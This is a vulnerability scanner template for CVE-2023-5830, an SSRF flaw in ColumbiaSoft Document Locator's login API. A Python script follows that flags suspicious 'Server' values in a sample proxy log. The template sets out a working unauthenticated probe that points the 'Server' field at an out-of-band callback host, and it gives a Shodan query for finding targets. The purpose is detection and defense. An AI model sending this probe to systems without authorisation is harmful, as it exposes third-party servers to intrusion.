id: CVE-2023-5830

info:
  name: ColumbiaSoft DocumentLocator - Improper Authentication
  author: Gonski
  severity: critical
  description: |
    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locator application by confirming an external DNS interaction/lookup after modifying the value of the client-side SERVER parameter at /api/authentication/login.
  impact: |
    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
    - https://vuldb.com/?id.243729
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5830
    cwe-id: CWE-287
    epss-score: 0.00091
    epss-percentile: 0.37579
    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: documentlocator
    product: document_locator
    shodan-query: 'title:"Document Locator - WebTools"'
  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools

http:
  - raw:
      - |
        @timeout: 20s
        POST /api/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {
          "LoginType": "differentWindows",
          "User": "{{randstr}}",
          "Password": "{{rand_base(5, "abc")}}",
          "Domain": "{{randstr}}",
          "Server": "{{interactsh-url}}",
          "Repository": "{{randstr}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '"Authorized":false'
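The template above works by placing a caller-controlled host name in the login body's `Server` field and watching for the resulting DNS lookup. The following added example (not part of the template or of the vendor's product) shows the defender's side of the same idea: scanning a constructed JSON-lines proxy log of login requests and flagging any whose `Server` value is not one of the deployment's known repository servers. The log format, the `KNOWN_SERVERS` allowlist and the sample records are all assumptions for illustration.

```python
import json
from urllib.parse import urlparse

# Constructed sample (not a real product log): JSON-lines records from a reverse proxy
# that logs login request bodies; the second record mimics an out-of-band probe.
SAMPLE_LOG = r'''
{"src":"10.0.0.5","method":"POST","path":"/api/authentication/login","body":"{\"LoginType\":\"differentWindows\",\"User\":\"jsmith\",\"Password\":\"x\",\"Domain\":\"CORP\",\"Server\":\"dlserver01\",\"Repository\":\"Main\"}"}
{"src":"203.0.113.9","method":"POST","path":"/api/authentication/login","body":"{\"LoginType\":\"differentWindows\",\"User\":\"qzx\",\"Password\":\"abcab\",\"Domain\":\"qzx\",\"Server\":\"c3f1a2b4.oast.example\",\"Repository\":\"qzx\"}"}
{"src":"10.0.0.7","method":"GET","path":"/api/status","body":""}
{"src":"10.0.0.8","method":"POST","path":"/api/authentication/login","body":"not json"}
'''

# Repository servers this deployment legitimately uses (assumed; site-specific).
KNOWN_SERVERS = {"dlserver01", "dlserver02"}

def normalize_host(server: str) -> str:
    """Reduce a Server value to a bare lowercase host name (drops scheme, port, path)."""
    s = server.strip().lower()
    if "://" in s:
        return urlparse(s).hostname or s
    return s.split(":", 1)[0]

def server_value(body: str):
    """Return the Server field of a JSON login body, or None if absent or unparsable."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    value = data.get("Server") if isinstance(data, dict) else None
    return value if isinstance(value, str) else None

def find_ssrf_attempts(log_text: str):
    """Return (src, Server) pairs for login requests whose Server is not an allowlisted host."""
    findings = []
    for line in log_text.strip().splitlines():
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        if entry.get("method") != "POST" or entry.get("path") != "/api/authentication/login":
            continue
        server = server_value(entry.get("body", ""))
        if server is not None and normalize_host(server) not in KNOWN_SERVERS:
            findings.append((entry.get("src"), server))
    return findings

if __name__ == "__main__":
    for src, server in find_ssrf_attempts(SAMPLE_LOG):
        print(f"possible CVE-2023-5830 probe from {src}: Server={server}")
```

Requests whose body is not JSON or that omit `Server` are skipped rather than flagged, so the same logic can be left running over a live log without false positives from malformed traffic.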